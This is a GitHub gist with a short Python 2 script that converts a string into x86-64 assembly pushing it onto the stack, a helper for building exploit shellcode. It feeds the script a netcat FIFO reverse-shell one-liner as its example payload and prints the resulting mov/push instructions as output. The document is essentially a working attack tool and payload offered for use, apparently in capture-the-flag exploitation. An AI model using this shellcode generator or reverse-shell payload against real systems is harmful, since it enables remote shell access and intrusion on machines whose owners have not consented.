Skip to content

Instantly share code, notes, and snippets.

@thinkycx
Last active April 19, 2021 07:13
Show Gist options
  • Save thinkycx/4cd3c90804b7e2366d49bf06d0cbb385 to your computer and use it in GitHub Desktop.
Save thinkycx/4cd3c90804b7e2366d49bf06d0cbb385 to your computer and use it in GitHub Desktop.
return asm shellcode : push string into stack and esp points to it!
#!/usr/bin/python
# date: 2018-12-11
# author: thinkycx
# description: return asm shellcode : push string into stack and esp points to it!
# usage:
# change payload and run it.
import math
def pushstr(string='/home/orw/flag',length=8):
'''
return asm shellcode : push string into stack and esp points to it!
'''
print 'pushasm: '+string
string = string[::-1]
pushstr = ''
times = int(math.ceil(float(len(string))/length))
startpos = 0
for i in range(1,times+1):
ilen = (len(string) - (times-i)*length)
ilen = ilen if ilen < length else length
istring = string[startpos:startpos+ilen].encode('hex')
pushstr += 'mov rcx, 0x%s\npush rcx\n' % istring
#pushstr += 'push 0x%s;' % istring
# print 'start '+str(startpos)+' end '+str(startpos+ilen)
startpos += ilen
print pushstr
# log.info("/home/orw/flag\x00".encode('hex'))
return pushstr
payload = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 7777 > /tmp/f'
pushstr(payload)
'''
Output:
pushasm: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 7777 > /tmp/f
mov rcx, 0x662f706d74
push rcx
mov rcx, 0x2f203e2037373737
push rcx
mov rcx, 0x20312e302e302e37
push rcx
mov rcx, 0x323120636e7c3126
push rcx
mov rcx, 0x3e3220692d206873
push rcx
mov rcx, 0x2f6e69622f7c662f
push rcx
mov rcx, 0x706d742f20746163
push rcx
mov rcx, 0x3b662f706d742f20
push rcx
mov rcx, 0x6f6669666b6d3b66
push rcx
mov rcx, 0x2f706d742f206d72
push rcx
'''
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment